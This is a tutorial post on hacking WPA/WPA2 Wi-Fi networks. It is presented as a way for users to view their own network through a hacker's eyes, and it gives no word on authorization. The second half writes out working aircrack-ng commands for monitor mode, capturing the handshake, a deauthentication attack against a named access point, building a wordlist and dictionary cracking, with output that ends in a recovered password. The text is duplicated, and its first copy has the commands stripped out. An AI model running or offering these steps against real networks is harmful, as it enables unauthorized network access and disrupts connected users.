The use of wireless Wi-Fi networks is very common these days. Many users think about the security of their networks and computers, sometimes they have questions about how to hack Wi-Fi, how real is this threat?
In this post, I invite regular users, perhaps far from wireless Wi-Fi security auditing, to look at their Wi-Fi network through the eyes of a hacker and even think about how to hack Wi-Fi?
Although the material below is presented in as simple a language as possible, we cannot do without concepts specific to Wi-Fi auditing.
Wi-Fi terminology
An access point (also Access Point), abbreviated as AP, is a device that enables the Wi-Fi network to which clients connect. The most popular access points are routers .
Client (Station) - a device that connects to the Access Point. The most common are computers, laptops, mobile phones, etc.
ESSID and SSID are the names for Wi-Fi wireless networks. They appear when you choose which network to connect to. Strictly speaking, ESSID and SSID are not the same, but the terms are often used interchangeably when testing Wi-Fi. In the screenshot below, the ESSIDs (network names) are MiAl, wifi88, etc.:
In this case, the BSSID is the MAC address of the wireless device . The set of numbers that contains the MAC address looks like this 50: 46: 5D: 6E: 8C: 20 .
A handshake (also a handshake) is an exchange of data between a station and an access point when a Wi-Fi connection is established. This data contains information that allows you to guess the password for the Wi-Fi network.
Brute force (also brute force) is a password attack method that lists all possible password options . It is time consuming and requires a lot of computing power.
Dictionary guessing is a password attack method that consists of brute-force attacks on common password variants. A significant portion of resources are used to achieve results.
Online WiFi password brute-force is a brute-force method that involves connecting to a hotspot with multiple candidate passwords. Practically not used due to extremely low search speed. The advantage of this method is that the monitor does not require a compatible WLAN adapter. The downside is that this method is very slow.
WPA and WPA2 - Wi-Fi Protected Access Technology, replaced the outdated WEP technology.
Wireless Wi-Fi card or wireless Wi-Fi adapter - any network card that is capable of connecting to a Wi-Fi network. At the moment, in laptops and phones, they are built into the case, in desktop computers they are usually an external device connected via USB.
In Monitor Mode, wireless adapters receive data packets intended not only for them, but also for other wireless devices.
Network interface - a name, notation in Linux for network cards / adapters.
The Wi-Fi network channel is a conventional digital designation of the frequency at which the Access Point is currently operating.
What you need to hack Wi-Fi
As already mentioned, special software for monitoring Wi-Fi networks is distributed free of charge. It is available by default on special distributions such as Kali Linux (follow the link for general information and installation instructions).
As you can see, all the components required to hack Wi-Fi are very handy. All other actions are performed in Kali Linux.
Wi-Fi adapter in monitor mode
By default, wireless adapters are in "managed" mode. In this mode, you can connect to the access point as a regular client.
Since we need to capture the handshake, which consists of data that the Station sends to the Access Point and the Access Point to the Station (i.e., which are not intended for us at any stage), we must put our Wi-Fi card in monitor mode. so that you can see this data and save it for further processing.
To enter the commands to switch the Wi-Fi adapter to monitor mode, we need to find the name of the wireless interface . To do this, open a console and enter the command:
The name of the wireless interface is indicated in the line with the word Interface , for example, in my case, it is wlan0. We remember this value, as we will need it in the future.
The monitor mode is not something usual for the operating system, so some programs, without asking, silently switch the Wi-Fi adapter into a managed mode. This can interfere with us, so with the help of the following two commands, we close the programs that may interfere with us:
Now we can finally put the wireless card into monitor mode. To do this, run the command sequence
replacing <INTERFACE> with the actual name of your wireless interface (mine is wlan0):
It seems like nothing happened, but typing the command
We will see something like the following:
In it, the type monitor line says that our wireless card is in monitor mode.
Handshake (handshake)
As already mentioned, a handshake is data that is gradually transferred between the Station and the Access Point when the Station connects to the Access Point. This means that in order to capture a handshake, we must switch to the channel on which the access point is operating in order to listen to radio signals and wait for the moment when the Station connects to it. Because the wait can be delayed, a technique called a deauthentication attack is used, which is to forcefully reset the Wi-Fi connection between the access point and the station. Immediately after this disconnection, the Station tries to reconnect, and at this moment we exchange handshake.
Unfortunately, this method does not work if no one is connected to the Access Point.
Wi-Fi networks
To attack a Wi-Fi network, we need to know some of its characteristics. To get a list of all Wi-Fi networks available in range, run the command:
Please note that if you have a different name for the wireless interface, then instead of wlan0 you need to enter this name.
The described attack is applicable only for networks with WPA2 or WPA protection - such are the overwhelming majority.
A similar list of networks will be displayed:
When you see the network you want to attack in the list, stop the program by pressing CTRL + c .
Let's say I'm interested in a network with ESSID (name) dlink. As you can see in the screenshot, its characteristics are as follows: BSSID - 00: 1E: 58: C6: AC: FB, uses WPA2, works on the sixth channel. In addition, a nonzero #Data value (captured data sent by this AP) assumes that one or more stations are connected to it.
To capture a handshake, use the following command:
Where:
For my data, the command looks like this:
The next screenshot shows the AP of interest to us again, and now the section with stations is visible:
In the full list of TDs, a section with stations was also present, but it went beyond the bottom edge of the screen, so it did not appear in the screenshot.
For the station in the BSSID field, we see a value that corresponds to the BSSID of the access point, that is, 00: 1E: 58: C6: AC: FB, this means that at the moment this station is connected to the AP of interest to us. There are now two options:
1) wait until the Station disconnects and reconnects to the AP for natural reasons
2) perform a deauthentication attack to speed up the process
Deauthentication attack
To perform deauthentication without stopping recording the traffic started in the previous step, open a new console window and enter a command like this:
Where:
The program will output something like this:
A new record will appear in the upper right corner of the screen for capturing data:
It means that the handshake has been successfully captured.
Dictionary attack
Now we need to start iterating over the data.
Let's prepare a dictionary:
The dictionary file in this case is called newrockyou.txt.
To find out the name of the captured handshake, run the command:
This will display something like the following (there may be more records if you have repeatedly captured handshakes):
We are only interested in the capture-01.cap file, which contains the handshake.
To iterate over the dictionary, use the following command:
So, in my case, the exact command is as follows:
This command starts the password guessing process, the following window is displayed during the search process:
Password picked up:
This is evidenced by the entry KEY FOUND! [pattayateam] where the password for the Wi-Fi network is pattayateam. Using this password, you can connect to the wireless access point from any device (computer, phone), as other legitimate users do.
In this post, I invite regular users, perhaps far from wireless Wi-Fi security auditing, to look at their Wi-Fi network through the eyes of a hacker and even think about how to hack Wi-Fi?
Although the material below is presented in as simple a language as possible, we cannot do without concepts specific to Wi-Fi auditing.
Wi-Fi terminology
An access point (also Access Point), abbreviated as AP, is a device that enables the Wi-Fi network to which clients connect. The most popular access points are routers .
Client (Station) - a device that connects to the Access Point. The most common are computers, laptops, mobile phones, etc.
ESSID and SSID are the names for Wi-Fi wireless networks. They appear when you choose which network to connect to. Strictly speaking, ESSID and SSID are not the same, but the terms are often used interchangeably when testing Wi-Fi. In the screenshot below, the ESSIDs (network names) are MiAl, wifi88, etc.:
In this case, the BSSID is the MAC address of the wireless device . The set of numbers that contains the MAC address looks like this 50: 46: 5D: 6E: 8C: 20 .
A handshake (also a handshake) is an exchange of data between a station and an access point when a Wi-Fi connection is established. This data contains information that allows you to guess the password for the Wi-Fi network.
Brute force (also brute force) is a password attack method that lists all possible password options . It is time consuming and requires a lot of computing power.
Dictionary guessing is a password attack method that consists of brute-force attacks on common password variants. A significant portion of resources are used to achieve results.
Online WiFi password brute-force is a brute-force method that involves connecting to a hotspot with multiple candidate passwords. Practically not used due to extremely low search speed. The advantage of this method is that the monitor does not require a compatible WLAN adapter. The downside is that this method is very slow.
WPA and WPA2 - Wi-Fi Protected Access Technology, replaced the outdated WEP technology.
Wireless Wi-Fi card or wireless Wi-Fi adapter - any network card that is capable of connecting to a Wi-Fi network. At the moment, in laptops and phones, they are built into the case, in desktop computers they are usually an external device connected via USB.
In Monitor Mode, wireless adapters receive data packets intended not only for them, but also for other wireless devices.
Network interface - a name, notation in Linux for network cards / adapters.
The Wi-Fi network channel is a conventional digital designation of the frequency at which the Access Point is currently operating.
What you need to hack Wi-Fi
- A computer on which Linux can be installed
- Specialized software for Linux, it is free (i.e. distributed free of charge and open source)
- Wireless Wi-Fi card that supports monitor mode. List of actual maps.
- The relevant knowledge and skills can be found in this article.
As already mentioned, special software for monitoring Wi-Fi networks is distributed free of charge. It is available by default on special distributions such as Kali Linux (follow the link for general information and installation instructions).
As you can see, all the components required to hack Wi-Fi are very handy. All other actions are performed in Kali Linux.
Wi-Fi adapter in monitor mode
By default, wireless adapters are in "managed" mode. In this mode, you can connect to the access point as a regular client.
Since we need to capture the handshake, which consists of data that the Station sends to the Access Point and the Access Point to the Station (i.e., which are not intended for us at any stage), we must put our Wi-Fi card in monitor mode. so that you can see this data and save it for further processing.
To enter the commands to switch the Wi-Fi adapter to monitor mode, we need to find the name of the wireless interface . To do this, open a console and enter the command:
Code:
sudo iw devThe name of the wireless interface is indicated in the line with the word Interface , for example, in my case, it is wlan0. We remember this value, as we will need it in the future.
The monitor mode is not something usual for the operating system, so some programs, without asking, silently switch the Wi-Fi adapter into a managed mode. This can interfere with us, so with the help of the following two commands, we close the programs that may interfere with us:
Code:
sudo systemctl stop NetworkManager
sudo airmon-ng check killNow we can finally put the wireless card into monitor mode. To do this, run the command sequence
Code:
sudo ip link set <INTERFACE> down
sudo iw <INTERFACE> set monitor control
sudo ip link set <INTERFACE> upreplacing <INTERFACE> with the actual name of your wireless interface (mine is wlan0):
Code:
sudo ip link set wlan0 down
sudo iw wlan0 set monitor control
sudo ip link set wlan0 upIt seems like nothing happened, but typing the command
Code:
sudo iw devWe will see something like the following:
In it, the type monitor line says that our wireless card is in monitor mode.
Handshake (handshake)
As already mentioned, a handshake is data that is gradually transferred between the Station and the Access Point when the Station connects to the Access Point. This means that in order to capture a handshake, we must switch to the channel on which the access point is operating in order to listen to radio signals and wait for the moment when the Station connects to it. Because the wait can be delayed, a technique called a deauthentication attack is used, which is to forcefully reset the Wi-Fi connection between the access point and the station. Immediately after this disconnection, the Station tries to reconnect, and at this moment we exchange handshake.
Unfortunately, this method does not work if no one is connected to the Access Point.
Wi-Fi networks
To attack a Wi-Fi network, we need to know some of its characteristics. To get a list of all Wi-Fi networks available in range, run the command:
Code:
sudo airodump-ng wlan0Please note that if you have a different name for the wireless interface, then instead of wlan0 you need to enter this name.
The described attack is applicable only for networks with WPA2 or WPA protection - such are the overwhelming majority.
A similar list of networks will be displayed:
When you see the network you want to attack in the list, stop the program by pressing CTRL + c .
Let's say I'm interested in a network with ESSID (name) dlink. As you can see in the screenshot, its characteristics are as follows: BSSID - 00: 1E: 58: C6: AC: FB, uses WPA2, works on the sixth channel. In addition, a nonzero #Data value (captured data sent by this AP) assumes that one or more stations are connected to it.
To capture a handshake, use the following command:
Code:
sudo airodump-ng -c CHANNEL --bssid MAC_ADDRESS -w FILE INTERFACEWhere:
- CHANNEL is the channel on which the TD operates
- MAC_ADDRESS is the BSSID of the attacked AP
- FILE - the name of the file where the handshake will be written
- INTERFACE - the name of the wireless interface in monitor mode
For my data, the command looks like this:
Code:
sudo airodump-ng -c 6 --bssid 00: 1E: 58: C6: AC: FB -w capture wlan0The next screenshot shows the AP of interest to us again, and now the section with stations is visible:
In the full list of TDs, a section with stations was also present, but it went beyond the bottom edge of the screen, so it did not appear in the screenshot.
For the station in the BSSID field, we see a value that corresponds to the BSSID of the access point, that is, 00: 1E: 58: C6: AC: FB, this means that at the moment this station is connected to the AP of interest to us. There are now two options:
1) wait until the Station disconnects and reconnects to the AP for natural reasons
2) perform a deauthentication attack to speed up the process
Deauthentication attack
To perform deauthentication without stopping recording the traffic started in the previous step, open a new console window and enter a command like this:
Code:
sudo aireplay-ng -0 3 -a MAC_ADDRESS INTERFACEWhere:
- MAC_ADDRESS is the BSSID of the attacked AP
- INTERFACE - the name of the wireless interface in monitor mode
Code:
sudo aireplay-ng -0 3 -a 00: 1E: 58: C6: AC: FB wlan0The program will output something like this:
Code:
08:17:30 Waiting for beacon frame (BSSID: 00: 1E: 58: C6: AC: FB) on channel 6
NB: this attack is more effective when targeting
a connected wireless client (-c <client's mac>).
08:17:30 Sending DeAuth to broadcast - BSSID: [00: 1E: 58: C6: AC: FB]
08:17:30 Sending DeAuth to broadcast - BSSID: [00: 1E: 58: C6: AC: FB]
08:17:31 Sending DeAuth to broadcast - BSSID: [00: 1E: 58: C6: AC: FB]A new record will appear in the upper right corner of the screen for capturing data:
Code:
WPA handshake: 00: 1E: 58: C6: AC: FBIt means that the handshake has been successfully captured.
Dictionary attack
Now we need to start iterating over the data.
Let's prepare a dictionary:
Code:
cp /usr/share/wordlists/rockyou.txt.gz.
gunzip rockyou.txt.gz
cat rockyou.txt | sort | uniq | pw-inspector -m 8 -M 63> newrockyou.txtThe dictionary file in this case is called newrockyou.txt.
To find out the name of the captured handshake, run the command:
Code:
ls -l capture *This will display something like the following (there may be more records if you have repeatedly captured handshakes):
Code:
-rw-r - r-- 1 root root 73164 Sep 30 08:24 capture-01.cap
-rw-r - r-- 1 root root 478 Sep 30 08:24 capture-01.csv
-rw-r - r-- 1 root root 583 Sep 30 08:24 capture-01.kismet.csv
-rw-r - r-- 1 root root 2766 Sep 30 08:24 capture-01.kismet.netxmlWe are only interested in the capture-01.cap file, which contains the handshake.
To iterate over the dictionary, use the following command:
Code:
aircrack-ng -w DICTIONARY_FILE CAPTURE_FILESo, in my case, the exact command is as follows:
Code:
aircrack-ng -w newrockyou.txt capture-01.capThis command starts the password guessing process, the following window is displayed during the search process:
Password picked up:
This is evidenced by the entry KEY FOUND! [pattayateam] where the password for the Wi-Fi network is pattayateam. Using this password, you can connect to the wireless access point from any device (computer, phone), as other legitimate users do.
